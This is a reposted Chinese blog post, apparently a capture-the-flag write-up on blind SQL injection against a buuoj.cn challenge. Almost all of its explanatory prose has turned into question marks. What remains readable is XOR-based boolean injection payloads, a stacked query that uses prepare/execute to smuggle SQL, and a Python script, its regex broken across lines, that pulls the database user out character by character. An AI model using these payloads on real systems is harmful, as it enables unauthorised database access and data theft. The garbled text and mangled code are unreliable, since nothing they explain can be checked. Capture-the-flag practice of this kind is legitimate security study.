本文共 1744 字，大约阅读时间需要 5 分钟。

SQL???Web????

????????????????SQL???????????????????????????????????????????????????????????????????????????????????

?????

???????????SQL?????????????????????????????????????????????????????????????????@???union?select????????????

??????????????SQL???

2^(if(ascii(mid(user(),1,1))>0,0,1))

??????????????????????????0??????????????????????0?????0????????1???????????????????????

?????????????????????????????????????????????WordPress?WP????????

???????

?????????????????????????SQL??????????500????????????????????????????????????cookie?????????

??????????????????????????????

? id=2; set @sql = char(12, 324, 23, 23, ); prepare query from @sql; execute query;

?????????????????????SQL???

??????????????????????????????mid???????ascii?????????????????????

????WordPress

???????????WordPress???????????????????????????????????????????

???user.php????????????????id????????????????????

if (ascii(mid(user(),1,1)) > 0, 0, 1)

???????????????????????

?????????????????

1^

??????????????????????????????

??????????????????????????

?????????????Python??????????????????????

for i in range(1,15):    for j in range(50,155):        url = '''http://77a4fc87-2f45-4e87-b5fe-0ea6cf054bd3.node3.buuoj.cn/user/user.php?id=1^(ascii(mid(user(),{},1))={})'''.format(i,j)        cookie = { "PHPSESSID":"514gsk3jr3pf1ubri65d5pr714"}        res = requests.get(url=url, cookies=cookie)        content = re.findall('
.*
', res.text, re.M|re.I)        if ("admin" not in content[0]):            database += chr(j)            break

??????????????????id?username???????????????????

?????????????????????????????????????????????????flag???????????????

?????SQL????????????????????????????????????????????????????????????????

转载地址：http://ykgg.baihongyu.com/